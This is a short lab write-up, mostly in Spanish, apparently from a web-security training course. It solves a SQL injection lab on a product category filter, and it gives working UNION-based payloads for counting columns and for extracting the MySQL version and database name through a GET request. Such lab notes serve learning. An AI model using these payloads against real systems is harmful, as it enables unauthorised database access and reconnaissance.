04 Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft
Objetivo
This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
To solve the lab, display the database version string.
Solución
Podemos usar
'+UNION+SELECT+'abc','def'#
para añadir texto directamente al utilizar consultas UNION
Debemos verificar cuantas columnas nos va a devolver nuestra query, podemos utilizar UNION SELECT ‘TEXT1’, ‘TEXT2, ‘TEXT3'#
sI vemos que nos muestra error 500, significa que la consulta original no tiene esa cantidad de columnas

Utilizamos el siguiente payload para que nos muestre la versión de la BD y el nombre de la BD
Payload: '+UNION+SELECT+@@version,DATABASE()#
GET /filter?category=Lifestyle'+UNION+SELECT+@@version,DATABASE()#



Previous02 Lab: SQL injection vulnerability allowing login bypassNext05 Lab: SQL injection attack, listing the database contents on non-Oracle databases
Last updated